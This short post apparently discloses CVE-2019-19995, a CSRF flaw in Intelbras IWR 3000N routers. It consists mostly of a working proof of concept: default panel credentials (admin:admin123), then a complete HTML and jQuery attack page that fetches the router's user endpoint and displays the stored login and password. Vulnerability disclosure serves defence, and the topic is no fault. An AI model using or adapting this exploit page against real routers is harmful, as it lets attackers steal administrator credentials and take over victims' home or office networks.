CSRF — CVE-2019–19995
1 min readDec 26, 2019
A CSRF issue was discovered on Intelbras IWR 3000N 1.8.7 devices, leading to complete control of the router, as demonstrated by v1/system/user.
Proof Of Concept
First Step —
Login in the panel of router, (admin:admin123):
Second Step —
Create a page for the CSRF attack. As per example below.
<html>
<head>
<title>IWR 3000N - CSRF on Exploit </title>
</head>
<body>
<button onclick="exploit()">Exploit Button!</button>
<p>Click to get the login.</p>
<script>
function exploit(){
$.get( "http://10.0.0.1:80/v1/system/user" )
.done(( data ) => {
alert( data );
})
.fail(function( err, status) {
alert( status );
});
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>
</html>
Third Step —
By clicking on the “Exploit” button, you have access to login and password.
Video —